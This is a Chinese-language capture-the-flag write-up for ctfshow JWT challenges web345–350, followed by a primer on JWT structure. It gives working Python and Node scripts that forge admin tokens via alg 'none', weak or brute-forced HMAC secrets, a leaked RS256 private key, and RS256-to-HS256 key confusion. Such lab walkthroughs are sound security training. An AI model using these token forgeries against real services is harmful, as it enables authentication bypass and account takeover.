ctfshow-jwt

题目

web345

打开查看页面源码提示/admin/，抓包看看有没有东西，发现是jwt，放jwt.io里看一下没有加密方式，那就是简单的base64进行转化，这里利用hackerbar进行发包

{"alg":"None","typ":"jwt"}[{"iss":"admin","iat":1725711082,"exp":1725718282,"nbf":1725711082,"sub":"admin","jti":"49c32732a51fddf321b60f8bd4e3b3fd"}]

这里把sub的user改成admin，然后再进行base64加密就行，放到原来的地方再发包得到flag

web346

正常流程用jwt.io检测一下，发现是 “alg”: “HS256”加密，JWT支持将算法设定为“None”。如果“alg”字段设为“ None”，那么签名会被置空，这样任何token都是有效的。这里直接base64看不了，利用网站，自己脚本编一下

import jwt
headers={
  "alg": "none",
  "typ": "JWT"
}
token_dict={
  "iss": "admin",
  "iat": 1725711820,
  "exp": 1725719020,
  "nbf": 1725711820,
  "sub": "admin",
  "jti": "db9c8eec3e315880838b4b09ee3d8345"
}
jwt_token= jwt.encode(token_dict,
                      "",
                      algorithm="none",
                      headers=headers)
print(jwt_token)

流程和上一题基本一致

web347

不能直接改了，有弱口令提示，猜测常见的的弱密码，发现结果是123456，改admin，输入弱密码，得到jwt流程基本和前面一致。

web348

这题标题提示的是爆破，需要利用工具是c-jwt-cracker，去github可以搜到工具，爆破一下得到密钥，剩余流程和之前的差不多

web349

先上代码

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
  
});

router.post('/',function(req,res,next){
	var flag="flag_here";
	res.type('html');
	var auth = req.cookies.auth;
	var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key
	jwt.verify(auth, cert, function(err, decoded) {
	  if(decoded.user==='admin'){
	  	res.end(flag);
	  }else{
	  	res.end('you are not admin');
	  }
	});
});

这题不一样了，是RS256，可以访问private.key和public.key，会下载密钥和公钥，把公私钥放进去流程也是一样，测试了一下在线网站好像不能直接运行啊，用python写个脚本吧

import jwt

private = open("private.key", 'r').read()
payload = {
  "user": "admin",
  "iat": 1725719515
}

headers = {
  "alg": "RS256",
  "typ": "JWT"
}
token = jwt.encode(payload=payload,
                   key=private,
                   algorithm="RS256",
                   headers=headers)
print(token)

web350

和上题大致一样，但是只给了public key,这题需要nodejs跑一下，先上个脚本吧

const jwt = require('jsonwebtoken');
var fs = require('fs');

var privateKey = fs.readFileSync('public.key');

var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });

console.log(token);

知识点

介绍

jwt(JSON Web Token)是一串json格式的字符串，由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息，这样服务端就无需保存任何关于用户或会话的信息，JWT可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准（(RFC 7519).该token被设计为紧凑且安全的，特别适用于分布式站点的单点登录（SSO）场景。

一个jwt token 由三部分组成，header,payload和signature,以点隔开，类似于orange.apple.banana这个样子

• header用来声明token的类型和签名用的算法等，需要经过base64Url编码，比如

{"alg":"HS256","typ":"JWT"}

alg表示的是签名的算法，默认是HMAC SHA256(写成HS256)

typ表示这个令牌的类型，统一写作JWT

• payload用来表示真正的token信息，也需要base64Url编码，比如

{"sub":"1234567890","name":"orange","iat":1516239022}

JWT 规定了7个官方字段，供选用
iss (issuer)：签发人
exp (expiration time)：过期时间
sub (subject)：主题
aud (audience)：受众
nbf (Not Before)：生效时间
iat (Issued At)：签发时间
jti (JWT ID)：编号

• signature，将前两部分用alg指定的算法加密，再经过Base64Url编码就是signature了，作用是防止数据篡改。

解码

正常使用https://jwt.io/这个网站，可以直观的了解header和payload

爆破secret.key工具c-jwt-cracker

我使用的是docker起的

docker run -it --rm  jwtcrack jwt内容